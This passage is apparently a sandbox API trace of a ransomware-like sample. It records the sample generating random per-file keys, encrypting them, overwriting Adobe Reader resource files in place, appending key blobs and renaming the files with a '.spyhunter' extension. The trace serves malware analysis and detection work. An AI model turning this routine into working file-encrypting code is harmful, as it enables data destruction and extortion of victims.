| out: pbBuffer=0x57e210) returned 1 [0180.048] GetProcessHeap () returned 0x2c0000 [0180.048] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0180.048] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e208*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e208*=0x30) returned 1 [0180.048] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}\\1041.mst" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\setup files\\{ac76ba86-7ad7-ffff-7b44-aa0000000001}\\1041.mst"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0180.050] GetProcessHeap () returned 0x2c0000 [0180.050] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0180.050] GetProcessHeap () returned 0x2c0000 [0180.050] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e8a8c0 | out: hHeap=0x2c0000) returned 1 [0180.050] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e210 | out: pbBuffer=0x57e210) returned 1 [0180.050] GetProcessHeap () returned 0x2c0000 [0180.050] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0180.050] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e208*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e208*=0x30) returned 1 [0180.050] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}\\1038.mst" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\setup files\\{ac76ba86-7ad7-ffff-7b44-aa0000000001}\\1038.mst"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0180.050] GetProcessHeap () returned 0x2c0000 [0180.050] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0180.050] GetProcessHeap () returned 0x2c0000 [0180.050] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e8a670 | out: hHeap=0x2c0000) returned 1 [0180.050] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e208 | out: pbBuffer=0x57e208) returned 1 [0180.050] GetProcessHeap () returned 0x2c0000 [0180.051] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0180.051] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e200*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e200*=0x30) returned 1 [0180.051] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}\\1036.mst" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\setup files\\{ac76ba86-7ad7-ffff-7b44-aa0000000001}\\1036.mst"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0180.051] GetProcessHeap () returned 0x2c0000 [0180.051] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0180.051] GetProcessHeap () returned 0x2c0000 [0180.051] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e8a548 | out: hHeap=0x2c0000) returned 1 [0180.051] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e208 | out: pbBuffer=0x57e208) returned 1 [0180.051] GetProcessHeap () returned 0x2c0000 [0180.051] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0180.051] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e200*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e200*=0x30) returned 1 [0180.051] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}\\1035.mst" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\setup files\\{ac76ba86-7ad7-ffff-7b44-aa0000000001}\\1035.mst"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0180.053] GetProcessHeap () returned 0x2c0000 [0180.053] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0180.053] GetProcessHeap () returned 0x2c0000 [0180.053] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e8a420 | out: hHeap=0x2c0000) returned 1 [0180.053] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e200 | out: pbBuffer=0x57e200) returned 1 [0180.053] GetProcessHeap () returned 0x2c0000 [0180.053] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0180.053] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e1f8*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e1f8*=0x30) returned 1 [0180.053] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}\\1033.mst" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\setup files\\{ac76ba86-7ad7-ffff-7b44-aa0000000001}\\1033.mst"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0180.053] GetProcessHeap () returned 0x2c0000 [0180.053] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0180.053] GetProcessHeap () returned 0x2c0000 [0180.053] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e8a1d0 | out: hHeap=0x2c0000) returned 1 [0180.053] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e200 | out: pbBuffer=0x57e200) returned 1 [0180.053] GetProcessHeap () returned 0x2c0000 [0180.053] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0180.053] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e1f8*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e1f8*=0x30) returned 1 [0180.054] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}\\1031.mst" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\setup files\\{ac76ba86-7ad7-ffff-7b44-aa0000000001}\\1031.mst"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0180.054] GetProcessHeap () returned 0x2c0000 [0180.054] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0180.054] GetProcessHeap () returned 0x2c0000 [0180.054] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e8a0a8 | out: hHeap=0x2c0000) returned 1 [0180.054] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e1f8 | out: pbBuffer=0x57e1f8) returned 1 [0180.054] GetProcessHeap () returned 0x2c0000 [0180.054] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0180.054] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e1f0*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e1f0*=0x30) returned 1 [0180.054] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}\\1030.mst" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\setup files\\{ac76ba86-7ad7-ffff-7b44-aa0000000001}\\1030.mst"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0180.054] GetProcessHeap () returned 0x2c0000 [0180.054] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0180.054] GetProcessHeap () returned 0x2c0000 [0180.054] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e89f80 | out: hHeap=0x2c0000) returned 1 [0180.054] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e1f8 | out: pbBuffer=0x57e1f8) returned 1 [0180.054] GetProcessHeap () returned 0x2c0000 [0180.054] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0180.054] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e1f0*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e1f0*=0x30) returned 1 [0180.054] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}\\1029.mst" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\setup files\\{ac76ba86-7ad7-ffff-7b44-aa0000000001}\\1029.mst"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0180.055] GetProcessHeap () returned 0x2c0000 [0180.055] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0180.055] GetProcessHeap () returned 0x2c0000 [0180.055] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e89e58 | out: hHeap=0x2c0000) returned 1 [0180.055] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e1f0 | out: pbBuffer=0x57e1f0) returned 1 [0180.055] GetProcessHeap () returned 0x2c0000 [0180.055] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0180.055] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e1e8*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e1e8*=0x30) returned 1 [0180.055] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}\\1028.mst" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\setup files\\{ac76ba86-7ad7-ffff-7b44-aa0000000001}\\1028.mst"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0180.055] GetProcessHeap () returned 0x2c0000 [0180.055] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0180.055] GetProcessHeap () returned 0x2c0000 [0180.055] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e89d30 | out: hHeap=0x2c0000) returned 1 [0180.055] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e1f0 | out: pbBuffer=0x57e1f0) returned 1 [0180.055] GetProcessHeap () returned 0x2c0000 [0180.055] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0180.055] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e1e8*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e1e8*=0x30) returned 1 [0180.056] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}\\1027.mst" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\setup files\\{ac76ba86-7ad7-ffff-7b44-aa0000000001}\\1027.mst"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0180.056] GetProcessHeap () returned 0x2c0000 [0180.056] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0180.056] GetProcessHeap () returned 0x2c0000 [0180.056] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e89c08 | out: hHeap=0x2c0000) returned 1 [0180.056] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e1e8 | out: pbBuffer=0x57e1e8) returned 1 [0180.056] GetProcessHeap () returned 0x2c0000 [0180.056] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0180.056] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e1e0*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e1e0*=0x30) returned 1 [0180.056] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\win\\CP1255.TXT" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\win\\cp1255.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0180.066] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\win\\CP1255.TXT") returned 97 [0180.066] StrStrW (lpFirst="CP1255.TXT", lpSrch=".txt") returned 0x0 [0180.066] GetProcessHeap () returned 0x2c0000 [0180.066] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0180.066] ReadFile (in: hFile=0x178, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57e1a4, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x57e1a4*=0x219a, lpOverlapped=0x0) returned 1 [0180.093] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffde66, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0180.093] WriteFile (in: hFile=0x178, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x219a, lpNumberOfBytesWritten=0x57e1a4, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x57e1a4*=0x219a, lpOverlapped=0x0) returned 1 [0180.093] GetProcessHeap () returned 0x2c0000 [0180.093] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0180.093] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0180.093] WriteFile (in: hFile=0x178, lpBuffer=0x57e1e4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57e1a4, lpOverlapped=0x0 | out: lpBuffer=0x57e1e4*, lpNumberOfBytesWritten=0x57e1a4*=0x4, lpOverlapped=0x0) returned 1 [0180.093] WriteFile (in: hFile=0x178, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57e1a4, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x57e1a4*=0x30, lpOverlapped=0x0) returned 1 [0180.093] CloseHandle (hObject=0x178) returned 1 [0180.093] GetProcessHeap () returned 0x2c0000 [0180.093] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0180.093] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\win\\CP1255.TXT.spyhunter") returned 107 [0180.094] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\win\\CP1255.TXT" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\win\\cp1255.txt"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\win\\CP1255.TXT.spyhunter" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\win\\cp1255.txt.spyhunter")) returned 1 [0180.095] GetProcessHeap () returned 0x2c0000 [0180.096] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0180.096] GetProcessHeap () returned 0x2c0000 [0180.096] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0180.096] GetProcessHeap () returned 0x2c0000 [0180.096] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ee3388 | out: hHeap=0x2c0000) returned 1 [0180.096] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e1e8 | out: pbBuffer=0x57e1e8) returned 1 [0180.096] GetProcessHeap () returned 0x2c0000 [0180.096] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0180.096] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e1e0*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e1e0*=0x30) returned 1 [0180.096] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\win\\CP1250.TXT" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\win\\cp1250.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0180.145] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\win\\CP1250.TXT") returned 97 [0180.145] StrStrW (lpFirst="CP1250.TXT", lpSrch=".txt") returned 0x0 [0180.145] GetProcessHeap () returned 0x2c0000 [0180.145] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0180.145] ReadFile (in: hFile=0x178, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57e1a4, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x57e1a4*=0x2664, lpOverlapped=0x0) returned 1 [0180.150] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffd99c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0180.150] WriteFile (in: hFile=0x178, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2664, lpNumberOfBytesWritten=0x57e1a4, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x57e1a4*=0x2664, lpOverlapped=0x0) returned 1 [0180.151] GetProcessHeap () returned 0x2c0000 [0180.151] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0180.151] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0180.151] WriteFile (in: hFile=0x178, lpBuffer=0x57e1e4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57e1a4, lpOverlapped=0x0 | out: lpBuffer=0x57e1e4*, lpNumberOfBytesWritten=0x57e1a4*=0x4, lpOverlapped=0x0) returned 1 [0180.151] WriteFile (in: hFile=0x178, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57e1a4, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x57e1a4*=0x30, lpOverlapped=0x0) returned 1 [0180.151] CloseHandle (hObject=0x178) returned 1 [0180.151] GetProcessHeap () returned 0x2c0000 [0180.151] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0180.151] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\win\\CP1250.TXT.spyhunter") returned 107 [0180.151] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\win\\CP1250.TXT" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\win\\cp1250.txt"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\win\\CP1250.TXT.spyhunter" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\win\\cp1250.txt.spyhunter")) returned 1 [0180.152] GetProcessHeap () returned 0x2c0000 [0180.152] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0180.152] GetProcessHeap () returned 0x2c0000 [0180.152] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0180.152] GetProcessHeap () returned 0x2c0000 [0180.152] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ee1a18 | out: hHeap=0x2c0000) returned 1 [0180.152] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e1e0 | out: pbBuffer=0x57e1e0) returned 1 [0180.152] GetProcessHeap () returned 0x2c0000 [0180.152] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0180.153] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e1d8*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e1d8*=0x30) returned 1 [0180.153] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Mac\\SYMBOL.TXT" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\mac\\symbol.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0180.153] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Mac\\SYMBOL.TXT") returned 97 [0180.153] StrStrW (lpFirst="SYMBOL.TXT", lpSrch=".txt") returned 0x0 [0180.153] GetProcessHeap () returned 0x2c0000 [0180.153] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0180.153] ReadFile (in: hFile=0x178, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57e19c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x57e19c*=0x2800, lpOverlapped=0x0) returned 1 [0180.155] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0180.155] WriteFile (in: hFile=0x178, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57e19c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x57e19c*=0x2800, lpOverlapped=0x0) returned 1 [0180.155] GetProcessHeap () returned 0x2c0000 [0180.155] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0180.155] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0180.155] WriteFile (in: hFile=0x178, lpBuffer=0x57e1dc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57e19c, lpOverlapped=0x0 | out: lpBuffer=0x57e1dc*, lpNumberOfBytesWritten=0x57e19c*=0x4, lpOverlapped=0x0) returned 1 [0180.310] WriteFile (in: hFile=0x178, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57e19c, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x57e19c*=0x30, lpOverlapped=0x0) returned 1 [0180.310] CloseHandle (hObject=0x178) returned 1 [0180.311] GetProcessHeap () returned 0x2c0000 [0180.311] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0180.311] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Mac\\SYMBOL.TXT.spyhunter") returned 107 [0180.311] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Mac\\SYMBOL.TXT" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\mac\\symbol.txt"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Mac\\SYMBOL.TXT.spyhunter" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\mac\\symbol.txt.spyhunter")) returned 1 [0180.312] GetProcessHeap () returned 0x2c0000 [0180.312] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0180.312] GetProcessHeap () returned 0x2c0000 [0180.312] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0180.312] GetProcessHeap () returned 0x2c0000 [0180.312] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ee2be0 | out: hHeap=0x2c0000) returned 1 [0180.312] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e1e0 | out: pbBuffer=0x57e1e0) returned 1 [0180.312] GetProcessHeap () returned 0x2c0000 [0180.313] RtlAllocateHeap (HeapHandle=0x2c0000, 